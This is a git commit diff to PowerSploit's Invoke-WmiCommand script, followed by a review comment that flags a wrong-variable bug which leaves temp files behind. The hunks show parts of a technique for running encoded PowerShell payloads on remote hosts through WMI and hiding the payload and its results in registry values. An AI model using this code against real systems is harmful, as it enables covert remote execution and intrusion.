authorMatt Graeber <mattgraeber@gmail.com>2015-12-15 11:55:47 -0800
committerMatt Graeber <mattgraeber@gmail.com>2015-12-15 11:55:47 -0800
commitf70c63f9d53167299404db582bc0a8acc96a661b (patch)
tree83c9da818fe705bec7330147e1c002184701f4b2
parentf6e032c3b14dd6433587c50a4fafcb43e5e18413 (diff)
downloadPowerSploit-f70c63f9d53167299404db582bc0a8acc96a661b.tar.gz
PowerSploit-f70c63f9d53167299404db582bc0a8acc96a661b.zip
Invoke-WmiCommand is now PSv2 compatible
This bug fix addresses issue #96. As much as I hate dropping files to disk, this was the easiest way to preserve objects in PSv2+. If someone wants to implement the [de]serialization themselves and keep everything in memory, please submit a PR.
-rw-r--r--CodeExecution/Invoke-WmiCommand.ps125
1 files changed, 19 insertions, 6 deletions
diff --git a/CodeExecution/Invoke-WmiCommand.ps1 b/CodeExecution/Invoke-WmiCommand.ps1
index 7d2bb17..80bed86 100644
--- a/CodeExecution/Invoke-WmiCommand.ps1
+++ b/CodeExecution/Invoke-WmiCommand.ps1
@@ -265,7 +265,7 @@ the output of your payload back. :P
}
$PowerShellPath = $Result.sValue
- Write-Verbose "Full PowerShell path: $PowerShellPath"
+ Write-Verbose "[$Computer] Full PowerShell path: $PowerShellPath"
$EncodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Payload))
@@ -296,11 +296,18 @@ the output of your payload back. :P
if (($Result.ReturnValue -eq 0) -and ($Result.sValue)) {
$Payload = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Result.sValue))
- $SerilizedPayloadResult = Invoke-Expression ($Payload) | % {
- [Management.Automation.PSSerializer]::Serialize($_, 4)
- }
+ $TempSerializedResultPath = [IO.Path]::GetTempFileName()
+
+ $PayloadResult = Invoke-Expression ($Payload)
+
+ Export-Clixml -InputObject $PayloadResult -Path $TempSerializedResultPath
+
+ $SerilizedPayloadText = [IO.File]::ReadAllText($TempSerializedResultPath)
+
+ $null = Invoke-WmiMethod @WmiMethodArgs -Name 'SetStringValue' -ArgumentList $Hive, $RegistryKeyPath, $SerilizedPayloadText, $RegistryResultValueName
+
+ Remove-Item -Path $SerilizedPayloadResult -Force
- $null = Invoke-WmiMethod @WmiMethodArgs -Name 'SetStringValue' -ArgumentList $Hive, $RegistryKeyPath, $SerilizedPayloadResult, $RegistryResultValueName
$null = Invoke-WmiMethod @WmiMethodArgs -Name 'DeleteValue' -ArgumentList $Hive, $RegistryKeyPath, $RegistryPayloadValueName
}
}
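Review bot: The cleanup line `Remove-Item -Path $SerilizedPayloadResult -Force` references the wrong variable: this hunk removes the only assignment to `$SerilizedPayloadResult` in that scope, so the temp file created by `[IO.Path]::GetTempFileName()` is never deleted and the Export-Clixml output (the full serialized result of the payload) is left behind in the temp directory of whichever account ran the script on that host; with the variable unset, Remove-Item will presumably also emit an error rather than silently succeed. The line should read `Remove-Item -Path $TempSerializedResultPath -Force`, matching the name used by Export-Clixml and ReadAllText two and four lines earlier. Because the serialized result can contain whatever the payload returned, it would also be worth wrapping the Export-Clixml / ReadAllText / SetStringValue steps in try/finally so the file is removed even when one of them fails, and a short comment such as `# PSv2 has no PSSerializer; round-trip through a temp file and delete it immediately` would explain why the file is created at all. The enclosing if-block and surrounding script body continue outside this hunk.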
@@ -329,7 +336,13 @@ the output of your payload back. :P
Write-Verbose "[$Computer] Payload results successfully retrieved from: $RegistryHive\$RegistryKeyPath\$RegistryResultValueName"
$SerilizedPayloadResult = $Result.sValue
- $PayloadResult = [Management.Automation.PSSerializer]::Deserialize($SerilizedPayloadResult)
+
+ $TempSerializedResultPath = [IO.Path]::GetTempFileName()
+
+ Out-File -InputObject $SerilizedPayloadResult -FilePath $TempSerializedResultPath
+ $PayloadResult = Import-Clixml -Path $TempSerializedResultPath
+
+ Remove-Item -Path $TempSerializedResultPath
$FinalResult = New-Object PSObject -Property @{
PSComputerName = $Computer